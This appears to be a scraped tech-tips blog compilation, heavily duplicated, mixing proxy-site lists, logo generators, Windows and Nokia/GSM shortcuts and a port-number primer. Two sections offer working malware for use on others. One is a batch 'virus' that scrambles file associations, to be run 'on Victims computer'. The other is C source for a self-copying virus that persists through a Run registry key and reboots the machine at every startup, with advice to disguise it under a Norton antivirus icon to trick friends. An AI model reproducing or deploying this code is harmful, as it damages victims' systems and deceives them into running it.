Here are the list of proxy website.Proxy websites allows us to bypass our current ISP’s IP and connect to targeted website with a different IP; thus hiding our actual origin from detectable. Internet users use proxy websites for various reasons, some to access websites potentially blocked by their colleges or workplace, some use it to test their scripts.
- http://www.hidemyass.com
- http://www.anonymizer.com
- http://www.wujie.net
- http://www.ultrareach.net
- http://surfshield.net
- http://www.guardster.com/
subscription/proxy_free.php - http://anonymouse.ws/anonwww.
html - http://www.browser-x.com
- http://www.spysurfing.com
- http://www.xerohour.org/hideme
- http://www.proxyz.be
- http://www.sc0rian.com/prox
- https://www.proxify.us
- http://kproxy.com/index.jsp
- http://www.brawl-hall.com/
pages/proxy.php - http://www.proxify.net
- http://proxy.computersteroids.
com/index0.php - http://www.unipeak.com
- http://flyproxy.com
- http://alienproxy.com
- http://proxify.com/
- http://www.unfilter.net
- http://www.proxymouse.com
- http://www.surfonym.com/cgi-
bin/nph-proxy - http://www.superproxy.be/
browse.pl - http://www.websiteguru.com/
mrnewguy - http://www.letsproxy.com
- http://www.fsurf.com
- http://indianproxy.com
- http://www.letmeby.com
- http://Boredatschool.net
- http://www.ibypass.org
- http://www.ipzap.com/
- https://proxify.biz
- http://kproxy.com/index.jsp
- http://www.attackcensorship.
com/attack-censorship.html - http://mrnewguy.com
- http://www.evilsprouts.co.uk/
defilter - http://www.proxify.info
- http://www.torify.com
- http://www.switchproxy.com
- http://www.proxifree.com
- http://www.secure-tunnel.com/
- http://www.proxify.cn
- http://www.arnit.net/
utilities/webproxy/new - http://www.proxify.co.uk
- http://www.betaproxy.com
- http://www.proxify.org
- http://www.proxychoice.com
- http://www.proxysnail.com
- http://www.anonypost.com
- http://www.thestrongestlinks.
com - http://www.hujiko.com
- http://www.anonproxy.info
- http://www.peoplesproxy.com
- http://www.freeproxy.us
- http://www.proxyweb.net
- http://www.nopath.com
- http://urlencoded.com
- http://www.pole.ws
- http://www.browseany.com
- http://www.spiderproxy.com
- http://www.clickcop.com
- http://www.sneakysurf.com
- http://www.mywebtunnel.com
- http://www.thewebtunnel.com
- http://www.3proxy.com
- http://www.yourfreeproxy.com
- http://www.proxy7.com
- http://www.fireprox.com
- http://www.stupidcensorship.
com - http://www.letsproxy.com
- http://www.sneak2.com
- http://www.cecid.com
- http://www.freeproxy.ca
- http://www.ibypass.org
- http://www.goproxing.com
- http://www.projectbypass.com/
- http://www.ipsecret.com
- http://www.nomorelimits.net
- http://www.proxify.de
- http://www.bywhat.com
- http://www.snoopblocker.com
- http://www.anonymizer.ru
- http://www.proxyking.net/
- http://www.perlproxy.com
- http://www.proxylord.com
- http://tntproxy.com
- http://satanproxy.com
- http://zombieinvasion.info
- http://demonproxy.com
- http://www.myfreeproxy.com
- http://www.gezcem.com/nph-
proxy.pl.old - http://mpleger.de
- http://www.the-cloak.com/
login.html - http://www.youtubeproxy.com
25 Great Logo Generators
Hello Friends,
You probably sometimes spend hours, maybe days to create one simple logo for your website. Hopefully, there are many logo generators online which can help you to easily create nice text logos. All you need to do is to add the text you want and the generator will create a logo for you. You can choose the font size, background,image height and width; all you need for a good logo text. Below you can find links for 25 simple but effective logo generators.
1. Gold Text
2.Light Text
3.Fire Text
4.. Bovinated Text
5.Blink Text
6. Silver Bling-Bling
7. Chrome Text
8.Glowing Steel
9.. Weave Text
10.. 3D Outline
11. Embossed Text
12. Autumn Text
13.Plasma Text
14. Alien Glow
15. glitter text
16.Halloween Text
17. Anniversary Text
18. Rainbow Text 2
19. Pimp Text
20. Overlapping Text
21. Matrix Text
22. Sram Dofus
23. Eniripsa Dofus
24. Sig Generator
25. Logo Maker
You probably sometimes spend hours, maybe days to create one simple logo for your website. Hopefully, there are many logo generators online which can help you to easily create nice text logos. All you need to do is to add the text you want and the generator will create a logo for you. You can choose the font size, background,image height and width; all you need for a good logo text. Below you can find links for 25 simple but effective logo generators.
1. Gold Text
2.Light Text
3.Fire Text
4.. Bovinated Text
5.Blink Text
6. Silver Bling-Bling
7. Chrome Text
8.Glowing Steel
9.. Weave Text
10.. 3D Outline
11. Embossed Text
12. Autumn Text
13.Plasma Text
14. Alien Glow
15. glitter text
16.Halloween Text
17. Anniversary Text
18. Rainbow Text 2
19. Pimp Text
20. Overlapping Text
21. Matrix Text
22. Sram Dofus
23. Eniripsa Dofus
24. Sig Generator
25. Logo Maker
On Screen Keyboard
Hello Friends,
On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick..
To use it go to start-> run and type osk
On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick..
To use it go to start-> run and type osk
Use Keyboard As Mouse
Hello Friends,
When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter .
Use the Numerical pad for controlling the mouse pointer.
5 is for click.
+ is for double click
- for right click.
When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter .
Use the Numerical pad for controlling the mouse pointer.
5 is for click.
+ is for double click
- for right click.
Free Latest Missed Call Alert For Vodafone
Hello Friends,
Below is the number which you have to dial and activate your free missed call alert
*62*+9155705#
Below is the number which you have to dial and activate your free missed call alert
*62*+9155705#
Nokia Secret Tricks
Hello Friends,
To check the phones Software revision for Nokia Mobile.
On the main screen type *#0000#
To enter in the secret menu in Nokia Phone.
On the main screen type *#92702689# [*#war0anty#]
It will take you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
To restore Factory Settings for Nokia mobile
*#7780# reset to factory settings.
Taking picture without getting noticed.
Turn on/off the "click" sound made by the camera by selecting the 'Silent' profile or by turning warning tones on/off.
Hiding your Mobile/ Cellphone Number
Go to: Menu > Tools > Settings > Call > Send My Caller ID >
'Yes', 'No' or 'Set By Network' to follow the default settings of your home network.
It works only with very few network who provide you facility of “Private Number”
Speed Dialing From Simcard contact (not stored in mobile phonebook)
Type number followed by # then call.
Example: 1# or 2# or 21#
To check the phones Software revision for Nokia Mobile.
On the main screen type *#0000#
To enter in the secret menu in Nokia Phone.
On the main screen type *#92702689# [*#war0anty#]
It will take you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
To restore Factory Settings for Nokia mobile
*#7780# reset to factory settings.
Taking picture without getting noticed.
Turn on/off the "click" sound made by the camera by selecting the 'Silent' profile or by turning warning tones on/off.
Hiding your Mobile/ Cellphone Number
Go to: Menu > Tools > Settings > Call > Send My Caller ID >
'Yes', 'No' or 'Set By Network' to follow the default settings of your home network.
It works only with very few network who provide you facility of “Private Number”
Speed Dialing From Simcard contact (not stored in mobile phonebook)
Type number followed by # then call.
Example: 1# or 2# or 21#
Secret tips and tricks for Gsm mobile and cellphone
Hello Friends,
Here is the some secret tips for GSM Mobile and CellPhone.
Type *#61# and press call - Check call redirection status.
Cancel all redirections: ##002#
*43# to activate call waiting, to deactivate #43#.
If your phone doesn't have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK. To deactivate it dial #33#barcode*#.
On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at once
If you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx#
If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call. (*#30# / *#31# or *31# / #31# ) Works on some networks.
Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.
When the sim card-pin blocked type
**042*pin2 old*newpin2*newpin2*
Here is the some secret tips for GSM Mobile and CellPhone.
Type *#61# and press call - Check call redirection status.
Cancel all redirections: ##002#
*43# to activate call waiting, to deactivate #43#.
If your phone doesn't have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK. To deactivate it dial #33#barcode*#.
On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at once
If you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx#
If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call. (*#30# / *#31# or *31# / #31# ) Works on some networks.
Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.
When the sim card-pin blocked type
**042*pin2 old*newpin2*newpin2*
Lock a Folder in Windows XP
Hello Friends,
If you want to Lock a folder in windows XP without any software. Follow the steps Below.
1. Make a Folder in C drive rename it as "abc" without quotes.
2. Now open Command Prompt from Start Menu.
3. Type "attrib +s +h C:\abc" without quotes and press enter.
4. This command will Make your folder invisble and it can not be seen even in hidden files and folders
5. To make it visible again type "attrib -s -h C:\abc"
6. You can lock any other folder also by changing the location C:\abc to address of your folder.
If you want to Lock a folder in windows XP without any software. Follow the steps Below.
1. Make a Folder in C drive rename it as "abc" without quotes.
2. Now open Command Prompt from Start Menu.
3. Type "attrib +s +h C:\abc" without quotes and press enter.
4. This command will Make your folder invisble and it can not be seen even in hidden files and folders
5. To make it visible again type "attrib -s -h C:\abc"
6. You can lock any other folder also by changing the location C:\abc to address of your folder.
Windows Tricks and Shortcuts
Hello Friends,
- To Minimise all the application and running windows press the "Windows + M " key together.
- To boost performance of your PC or to increase RAM virtually,
Right click on My Computer Icon on Desktop
>> Go to Properties
>> Go to Advanced
>> Go to Performance - Settings
>> Go to Advanced
>> Go to Virtual Memory - Change
Keep the initial size same as recommended and maximum size double of it then restart your system.
It will improve speed of windows and you can play some games which require higher RAM.
Extension changing Virus
Hello Friends,
What is Extension changer ? Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.
1. Open a Notepad and copy and paste the below code
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
2. Save it as virus.bat, and now you are ready to go…
3. Execute this on Victims computer
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….
What is Extension changer ? Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.
1. Open a Notepad and copy and paste the below code
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
2. Save it as virus.bat, and now you are ready to go…
3. Execute this on Victims computer
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….
Make A Virus Program In C to Restart the Computer at Every Startup
Hello Friends,
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\ system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\ system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\ system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\ system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\ system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\ system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\ system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\ system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\ system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\ Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\ system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\ Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres. exe”);
break;
case 3:
target=fopen(”E:\\windows\\ system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\ Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres. exe”);
break;
case 4:
target=fopen(”F:\\windows\\ system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\ Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres. exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart}
NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\ Microsoft\Windows\ CurrentVersion\Run
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
What are Port numbers???
Hello Friends,
The port numbers are divided into three ranges: the Well Known Ports,
the Registered Ports, and the Dynamic and/or Private Ports.
The Well Known Ports are those from 0 through 1023.
The Registered Ports are those from 1024 through 49151
The Dynamic and/or Private Ports are those from 49152 through 65535
WELL KNOWN PORT NUMBERS
The Well Known Ports are assigned by the IANA and on most systems can
only be used by system (or root) processes or by programs executed by
privileged users.
Ports are used in the TCP [RFC793] to name the ends of logical
connections which carry long term conversations. For the purpose of
providing services to unknown callers, a service contact port is
defined. This list specifies the port used by the server process as
its contact port. The contact port is sometimes called the
“well-known port”.
To the extent possible, these same port assignments are used with the
UDP [RFC768].
The range for assigned ports managed by the IANA is 0-1023.
The port numbers are divided into three ranges: the Well Known Ports,
the Registered Ports, and the Dynamic and/or Private Ports.
The Well Known Ports are those from 0 through 1023.
The Registered Ports are those from 1024 through 49151
The Dynamic and/or Private Ports are those from 49152 through 65535
WELL KNOWN PORT NUMBERS
The Well Known Ports are assigned by the IANA and on most systems can
only be used by system (or root) processes or by programs executed by
privileged users.
Ports are used in the TCP [RFC793] to name the ends of logical
connections which carry long term conversations. For the purpose of
providing services to unknown callers, a service contact port is
defined. This list specifies the port used by the server process as
its contact port. The contact port is sometimes called the
“well-known port”.
To the extent possible, these same port assignments are used with the
UDP [RFC768].
The range for assigned ports managed by the IANA is 0-1023.
General Keyboard Shortcuts
Hello Friends,
Below ate some general keyboard shortcuts..
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CT
RL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
Below ate some general keyboard shortcuts..
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
